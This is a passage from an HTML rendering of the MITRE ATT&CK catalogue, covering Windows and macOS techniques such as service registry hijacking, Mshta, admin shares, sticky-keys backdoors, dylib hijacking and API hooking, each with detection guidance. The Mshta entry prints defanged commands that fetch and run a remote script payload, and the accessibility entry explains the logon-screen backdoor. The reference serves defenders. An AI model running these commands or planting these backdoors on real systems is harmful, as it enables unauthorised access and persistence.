<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html">https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.us-cert.gov/ncas/alerts/TA15-314A">https://www.us-cert.gov/ncas/alerts/TA15-314A</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_service_registry_permissions_weakness_t1058"><a class="anchor" href="#_service_registry_permissions_weakness_t1058"></a><a class="link" href="#_service_registry_permissions_weakness_t1058">Service Registry Permissions Weakness - T1058</a></h3>
<div class="paragraph">
<p>Windows stores local service configuration information in the Registry under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. The information stored under a service&#8217;s Registry keys can be manipulated to modify a service&#8217;s execution parameters through tools such as the service controller, sc.exe, PowerShell, or Reg. Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: MSDN Registry Key Security)</p>
</div>
<div class="paragraph">
<p>If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).</p>
</div>
<div class="paragraph">
<p>Detection: Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path is changed to a location that is not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</p>
</div>
<div class="paragraph">
<p>Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: TechNet Autoruns) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process command-line parameters, Services, Windows Registry</p>
</div>
<div class="paragraph">
<p>Effective Permissions: SYSTEM</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<div class="paragraph">
<p>System Requirements: Ability to modify a service binPath/ImagePath value in the Registry</p>
</div>
<div class="paragraph">
<p>Contributors: Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 866. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1058">https://attack.mitre.org/wiki/Technique/T1058</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx">https://msdn.microsoft.com/library/windows/desktop/ms724878.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mshta_t1170"><a class="anchor" href="#_mshta_t1170"></a><a class="link" href="#_mshta_t1170">Mshta - T1170</a></h3>
<div class="paragraph">
<p>Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension &lt;code&gt;.hta&lt;/code&gt;. (Citation: Wikipedia HTML Application) HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser. (Citation: MSDN HTML Applications)</p>
</div>
<div class="paragraph">
<p>Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code (Citation: Cylance Dust Storm) (Citation: Red Canary HTA Abuse Part Deux) (Citation: FireEye Attacks Leveraging HTA) (Citation: Airbus Security Kovter Analysis) (Citation: FireEye FIN7 April 2017)</p>
</div>
<div class="paragraph">
<p>Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))&lt;/code&gt;</p>
</div>
<div class="paragraph">
<p>They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;</p>
</div>
<div class="paragraph">
<p>Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer&#8217;s security context, it also bypasses browser security settings. (Citation: GitHub SubTee The List)</p>
</div>
<div class="paragraph">
<p>Detection: Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the binary being executed.</p>
</div>
<div class="paragraph">
<p>Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Application whitelisting</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<div class="paragraph">
<p>Contributors: Ricardo Dias, Ye Yint Min Thu Htut, @yeyint_mth</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 867. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1170">https://attack.mitre.org/wiki/Technique/T1170</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/HTML%20Application">https://en.wikipedia.org/wiki/HTML%20Application</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/ms536471.aspx">https://msdn.microsoft.com/library/ms536471.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.cylance.com/content/dam/cylance/pdfs/reports/Op%20Dust%20Storm%20Report.pdf">https://www.cylance.com/content/dam/cylance/pdfs/reports/Op%20Dust%20Storm%20Report.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/">https://www.redcanary.com/blog/microsoft-html-application-hta-abuse-part-deux/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html">https://www.fireeye.com/blog/threat-research/2017/04/cve-2017-0199-hta-handler.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html">https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windows_admin_shares_t1077"><a class="anchor" href="#_windows_admin_shares_t1077"></a><a class="link" href="#_windows_admin_shares_t1077">Windows Admin Shares - T1077</a></h3>
<div class="paragraph">
<p>Windows systems have hidden network shares that are accessible only to administrators and provide the ability for remote file copy and other administrative functions. Example network shares include &lt;code&gt;C$&lt;/code&gt;, &lt;code&gt;ADMIN$&lt;/code&gt;, and &lt;code&gt;IPC$&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Adversaries may use this technique in conjunction with administrator-level Valid Accounts to remotely access a networked system over server message block (SMB) (Citation: Wikipedia SMB) to interact with systems using remote procedure calls (RPCs), (Citation: TechNet RPC) transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels. (Citation: Microsoft Admin Shares)</p>
</div>
<div class="paragraph">
<p>The Net utility can be used to connect to Windows admin shares on remote systems using &lt;code&gt;net use&lt;/code&gt; commands with valid credentials. (Citation: Technet Net Use)</p>
</div>
<div class="paragraph">
<p>Detection: Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. (Citation: Lateral Movement Payne) (Citation: Windows Event Forwarding Payne) Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as Net, on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process use of network, Authentication logs, Process command-line parameters, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<div class="paragraph">
<p>System Requirements: File and printer sharing over SMB enabled.
Host/network firewalls not blocking SMB ports between source and destination.
Use of domain account in administrator group on remote system or default system admin account.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 868. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1077">https://attack.mitre.org/wiki/Technique/T1077</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Server%20Message%20Block">https://en.wikipedia.org/wiki/Server%20Message%20Block</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc787851.aspx">https://technet.microsoft.com/en-us/library/cc787851.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://support.microsoft.com/kb/314984">http://support.microsoft.com/kb/314984</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/bb490717.aspx">https://technet.microsoft.com/bb490717.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.technet.com/b/jepayne/archive/2015/11/27/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts.aspx">http://blogs.technet.com/b/jepayne/archive/2015/11/27/tracking-lateral-movement-part-one-special-groups-and-specific-service-accounts.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blogs.technet.com/b/jepayne/archive/2015/11/24/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem.aspx">http://blogs.technet.com/b/jepayne/archive/2015/11/24/monitoring-what-matters-windows-event-forwarding-for-everyone-even-if-you-already-have-a-siem.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winlogon_helper_dll_t1004"><a class="anchor" href="#_winlogon_helper_dll_t1004"></a><a class="link" href="#_winlogon_helper_dll_t1004">Winlogon Helper DLL - T1004</a></h3>
<div class="paragraph">
<p>Winlogon is a part of some Windows versions that performs actions at logon. In Windows systems prior to Windows Vista, a Registry key can be modified that causes Winlogon to load a DLL on startup. Adversaries may take advantage of this feature to load adversarial code at startup for persistence.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for changes to registry entries in &lt;code&gt;HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify&lt;/code&gt; that do not correlate with known software, patch cycles, etc. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current Winlogon helper values. (Citation: TechNet Autoruns) New DLLs written to System32 that do not correlate with known good software or patching may also be suspicious.</p>
</div>
<div class="paragraph">
<p>Look for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, File monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 869. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1004">https://attack.mitre.org/wiki/Technique/T1004</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dylib_hijacking_t1157"><a class="anchor" href="#_dylib_hijacking_t1157"></a><a class="link" href="#_dylib_hijacking_t1157">Dylib Hijacking - T1157</a></h3>
<div class="paragraph">
<p>macOS and OS X use a common method to look for required dynamic libraries (dylib) to load into a program based on search paths. Adversaries can take advantage of ambiguous paths to plant dylibs to gain privilege escalation or persistence.</p>
</div>
<div class="paragraph">
<p>A common method is to see what dylibs an application uses, then plant a malicious version with the same name higher up in the search path. This typically results in the dylib being in the same folder as the application itself. (Citation: Writing Bad Malware for OSX) (Citation: Malware Persistence on OS X)
If the program is configured to run at a higher privilege level than the current user, then when the dylib is loaded into the application, the dylib will also run at that elevated level. This can be used by adversaries as a privilege escalation technique.</p>
</div>
<div class="paragraph">
<p>Detection: Objective-See&#8217;s Dylib Hijacking Scanner can be used to detect potential cases of dylib hijacking. Monitor file systems for moving, renaming, replacing, or modifying dylibs. Changes in the set of dylibs that are loaded by a process (compared to past behavior) that do not correlate with known software, patches, etc., are suspicious. Check the system for multiple dylibs with the same name and monitor which versions have historically been loaded into a process.</p>
</div>
<div class="paragraph">
<p>Platforms: macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: Administrator, root</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 870. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1157">https://attack.mitre.org/wiki/Technique/T1157</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf">https://www.blackhat.com/docs/us-15/materials/us-15-Wardle-Writing-Bad-A-Malware-For-OS-X.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf">https://www.rsaconference.com/writable/presentations/file%20upload/ht-r03-malware-persistence-on-os-x-yosemite%20final.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_remote_services_t1021"><a class="anchor" href="#_remote_services_t1021"></a><a class="link" href="#_remote_services_t1021">Remote Services - T1021</a></h3>
<div class="paragraph">
<p>An adversary may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</p>
</div>
<div class="paragraph">
<p>Detection: Correlate use of login activity related to remote services with unusual behavior or other malicious or suspicious activity. Adversaries will likely need to learn about an environment and the relationships between systems through Discovery techniques prior to attempting Lateral Movement.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs</p>
</div>
<div class="paragraph">
<p>System Requirements: Active remote service accepting connections and valid credentials</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 871. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1021">https://attack.mitre.org/wiki/Technique/T1021</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_accessibility_features_t1015"><a class="anchor" href="#_accessibility_features_t1015"></a><a class="link" href="#_accessibility_features_t1015">Accessibility Features - T1015</a></h3>
<div class="paragraph">
<p>Windows contains accessibility features that may be launched with a key combination before a user has logged in (for example, when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.</p>
</div>
<div class="paragraph">
<p>Two common accessibility programs are &lt;code&gt;C:\Windows\System32\sethc.exe&lt;/code&gt;, launched when the shift key is pressed five times and &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)</p>
</div>
<div class="paragraph">
<p>Depending on the version of Windows, an adversary may take advantage of these features in different ways because of code integrity enhancements. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in &lt;code&gt;%systemdir%\&lt;/code&gt;, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced. Examples for both methods:</p>
</div>
<div class="paragraph">
<p>For simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., &lt;code&gt;C:\Windows\System32\utilman.exe&lt;/code&gt;) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)</p>
</div>
<div class="paragraph">
<p>For the debugger method on Windows Vista and later as well as Windows Server 2008 and later, for example, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for the accessibility program (e.g., "utilman.exe"). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with RDP will cause the "debugger" program to be executed with SYSTEM privileges. (Citation: Tilbury 2014)</p>
</div>
<div class="paragraph">
<p>Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)</p>
</div>
<div class="paragraph">
<p>*On-Screen Keyboard: &lt;code&gt;C:\Windows\System32\osk.exe&lt;/code&gt;
*Magnifier: &lt;code&gt;C:\Windows\System32\Magnify.exe&lt;/code&gt;
*Narrator: &lt;code&gt;C:\Windows\System32\Narrator.exe&lt;/code&gt;
*Display Switcher: &lt;code&gt;C:\Windows\System32\DisplaySwitch.exe&lt;/code&gt;
*App Switcher: &lt;code&gt;C:\Windows\System32\AtBroker.exe&lt;/code&gt;</p>
</div>
<div class="paragraph">
<p>Detection: Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options&lt;/code&gt;.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, File monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: SYSTEM</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<div class="paragraph">
<p>Contributors: Paul Speulstra, AECOM Global Security Operations Center</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 872. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1015">https://attack.mitre.org/wiki/Technique/T1015</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html">https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom">https://www.slideshare.net/DennisMaldonado5/sticky-keys-to-the-kingdom</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/">http://blog.crowdstrike.com/registry-analysis-with-crowdresponse/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_taint_shared_content_t1080"><a class="anchor" href="#_taint_shared_content_t1080"></a><a class="link" href="#_taint_shared_content_t1080">Taint Shared Content - T1080</a></h3>
<div class="paragraph">
<p>Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary&#8217;s code on a remote system. Adversaries may use tainted shared content to move laterally.</p>
</div>
<div class="paragraph">
<p>Detection: Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process monitoring</p>
</div>
<div class="paragraph">
<p>System Requirements: Access to shared folders and content with write permissions</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 873. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1080">https://attack.mitre.org/wiki/Technique/T1080</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_external_remote_services_t1133"><a class="anchor" href="#_external_remote_services_t1133"></a><a class="link" href="#_external_remote_services_t1133">External Remote Services - T1133</a></h3>
<div class="paragraph">
<p>Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal enterprise network resources from external locations. There are often remote service gateways that manage connections and credential authentication for these services. Services such as Windows Remote Management can also be used externally.</p>
</div>
<div class="paragraph">
<p>Adversaries may use remote services to access and persist within a network. (Citation: Volexity Virtual Private Keylogging) Access to Valid Accounts to use the service is often a requirement, which could be obtained through credential pharming or by obtaining the credentials from users after compromising the enterprise network. Access to remote services may be used as part of Redundant Access during an operation.</p>
</div>
<div class="paragraph">
<p>Detection: Follow best practices for detecting adversary use of Valid Accounts for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Authentication logs</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: Daniel Oakley, Travis Smith, Tripwire</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 874. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1133">https://attack.mitre.org/wiki/Technique/T1133</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/">https://www.volexity.com/blog/2015/10/07/virtual-private-keylogging-cisco-web-vpns-leveraged-for-access-and-persistence/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_application_deployment_software_t1017"><a class="anchor" href="#_application_deployment_software_t1017"></a><a class="link" href="#_application_deployment_software_t1017">Application Deployment Software - T1017</a></h3>
<div class="paragraph">
<p>Adversaries may deploy malicious software to systems within a network using application deployment systems employed by enterprise administrators. The permissions required for this action vary by system configuration; local credentials may be sufficient with direct access to the deployment server, or specific domain credentials may be required. However, the system may require an administrative account to log in or to perform software deployment.</p>
</div>
<div class="paragraph">
<p>Access to a network-wide or enterprise-wide software deployment system enables an adversary to have remote code execution on all systems that are connected to such a system. The access may be used to laterally move to systems, gather information, or cause a specific effect, such as wiping the hard drives on all endpoints.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor application deployments from a secondary system. Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process use of network, Process monitoring</p>
</div>
<div class="paragraph">
<p>System Requirements: Access to application deployment software (EPO, HPCA, Altiris, etc.)</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 875. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1017">https://attack.mitre.org/wiki/Technique/T1017</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hooking_t1179"><a class="anchor" href="#_hooking_t1179"></a><a class="link" href="#_hooking_t1179">Hooking - T1179</a></h3>
<div class="paragraph">
<p>Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. Hooking involves redirecting calls to these functions and can be implemented via:
* '''Hooks procedures''', which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Engame Process Injection July 2017)
* '''Import address table (IAT) hooking''', which use modifications to a processs IAT, where pointers to imported API functions are stored. (Citation: Engame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)
* '''Inline hooking''', which overwrites the first bytes in an API function to redirect code flow. (Citation: Engame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)</p>
</div>
<div class="paragraph">
<p>Similar to Process Injection, adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process&#8217;s memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.</p>
</div>
<div class="paragraph">
<p>Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)</p>
</div>
<div class="paragraph">
<p>Hooking is commonly utilized by Rootkits to conceal files,
processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor for calls to the SetWindowsHookEx and SetWinEventHook functions, which install a hook procedure. (Citation: Microsoft Hook Overview) (Citation: Volatility Detecting Hooks Sept 2012) Also consider analyzing hook chains (which hold pointers to hook procedures for each type of hook) using tools (Citation: Volatility Detecting Hooks Sept 2012) (Citation: PreKageo Winhook Jul 2011) (Citation: Jay GetHooks Sept 2011) or by programmatically examining internal kernel structures. (Citation: Zairon Hooking Dec 2006) (Citation: EyeofRa Detecting Hooking June 2017)</p>
</div>
<div class="paragraph">
<p>Rootkits detectors (Citation: GMER Rootkits) can also be used to monitor for various flavors of hooking activity.</p>
</div>
<div class="paragraph">
<p>Verify integrity of live processes by comparing code in memory to that of corresponding static binaries, specifically checking for jumps and other instructions that redirect code flow. Also consider taking snapshots of newly started processes (Citation: Microsoft Process Snapshot) to compare the in-memory IAT to the real addresses of the referenced functions. (Citation: StackExchange Hooks Jul 2012) (Citation: Adlice Software IAT Hooks Oct 2014)</p>
</div>
<div class="paragraph">
<p>Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process Monitoring, Windows event logs</p>
</div>
